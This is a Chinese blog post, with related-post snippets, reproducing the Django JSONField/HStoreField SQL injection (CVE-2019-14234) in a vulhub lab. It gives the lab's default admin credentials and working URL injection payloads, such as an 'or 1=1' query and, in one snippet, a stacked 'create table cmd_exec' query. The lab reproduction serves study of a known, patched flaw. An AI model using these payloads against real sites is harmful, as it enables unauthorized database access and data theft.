Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234)

最新推荐文章于 2024-02-26 18:00:04 发布
最新推荐文章于 2024-02-26 18:00:04 发布
阅读量672 收藏
点赞数
文章标签: django sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56537388/article/details/134592548
版权
本文报道了Django在2019年发布的安全更新,修复了JSONField和HStoreField的SQL注入漏洞。通过搭建Docker环境并利用Django-Admin重现漏洞,展示了如何构造SQL注入payload进行攻击。
摘要由CSDN通过智能技术生成

漏洞描述

Django 于2019年8月1日 日发布了安全更新,修复了 JSONField 和 HStoreField 两个模型字段的 SQL 注入漏洞。

参考链接:

该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞的简单方法。

漏洞环境及利用

搭建docker环境

首先,使用用户名和密码登录 Django-Admin,admin,a123123123http://your-ip:8000/admin/

然后转到模型的列表视图:http://your-ip:8000/admin/vuln/collection/Collection

 构建sql注入payload

?detail__a%27b=123 

可以看到成功注入

 

or 1=1返回所有结果

?detail__title%27)%3d%271%27 or 1%3d1%2d%2d%20

 

blackK_YC
关注
[ vulhub漏洞复现篇 ] Django JSONField/HStoreField SQL 注入漏洞 CVE-2019-14234
qq_51577576的博客
09-30 2548
[ vulhub漏洞复现篇 ] Django JSONField/HStoreField SQL 注入漏洞 CVE-2019-14234 Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于DjangoJSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。
CVE-2019-14234 Django JSONField SQL注入漏洞
weixin_45260839的博客
06-25 1744
CVE-2019-14234 Django JSONField SQL注入漏洞
16 - vulhub - Django JSONField/HStoreField SQL注入漏洞CVE-2019-14234
易编橙 · 终身成长社群,相遇已是上上签!
11-03 1206
Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。 什么是JSONFieldDjango是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQ
Django JSONField/HStoreField SQL 注入漏洞 (CVE-2019-14234)
zzzzz1284的博客
01-05 214
CVE-2019-14234
CVE-2019-14234 Django JSONField SQL注入漏洞复现
m0_48520508的博客
07-28 2555
0x01简介 Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。 什么是JSONFieldDjango是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有
【研究】CVE-2019-14234 Django JSONField SQL注入漏洞复现
god_Zeo的安全博客
11-20 1735
【研究】CVE-2019-14234 Django JSONField SQL注入漏洞复现1.环境2.原理3.影响版本4.利用过程 1.环境 环境 直接使用vulhub的docker环境搭建 vulhub/django/CVE-2019-14234/ 2.原理 该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。 ...
漏洞django-cve_2019_14234 SQL注入
m0_62791432的博客
05-13 494
访问http://110.40.154.100:8000/进入页面 登录环境: 访问:http://1.1.1.1:8000/admin/vuln/collection/输入默认账户密码 账户:adimin 密码:a123123123 登录成功后看到以下界面:
Django JSONFieldHStoreField SQL注入漏洞CVE-2019-14234
黑白的博客
12-13 388
声明 好好学习,天天向上 漏洞描述 该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。 Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于DjangoJSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。 通过JSONField类获得KeyTransf
Django_JSONField_HStoreField_SQL注入漏洞 CVE-2019-14234 漏洞复现
ADummy的博客
02-22 198
Django JSONField / HStoreField SQL注入漏洞CVE-2019-14234) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>用户创建成功—>成功登录 0x01漏洞介绍 **Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。** ​
django SQL注入(CVE-2019-14234)
最新发布
m0_65150886的博客
02-26 633
Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。在1.11.x before 1.11.23、2.1.x before 2.1.11和2.2.x before 2.2.4的版本中,Django存在安全漏洞Django中使用了JSONField并且查询的“键名”可控,导致存在SQL注入漏洞
【WEB攻防】【CVE-2019-14234Django JSONField SQL注入 复现
AAAAAAAAAAAA66的博客
12-19 1659
BMZCTF 【CVE-2019-14234Django JSONField SQL注入
CVE-2019-14234漏洞复现(SQL注入
weixin_71090536的博客
09-23 432
漏洞环境(路径):vulhub / django / CVE-2019-14234。1. 首先,使用用户名和密码登录 Django-Admin。用户名密码为:admin / a123123123。即表明此处含有 SQL 注入漏洞。3. 在其 URL 中添加 GET 参数。
Django CVE-2019-14234
weixin_44110913的博客
09-19 1089
CVE-2019-14234Django JSONField SQL注入漏洞复现 你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切. 该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。 漏洞概述: Django通常搭配postg...
漏洞复现】Django -SQL注入漏洞复现(CVE-2019-14234)
过期的秋刀鱼
11-05 206
复现环境:Vulhub环境启动后,访问即可看到Django默认首页。
vulfocus Django SQL注入漏洞CVE-2019-14234
qq_43332837的博客
08-25 871
打开网址 访问/admin 后台登陆后访问/admin/vuln/collection/ poc: http://your-ip:8000/admin/vuln/collection/?detail__a%27b=123 http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20 得到flag ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值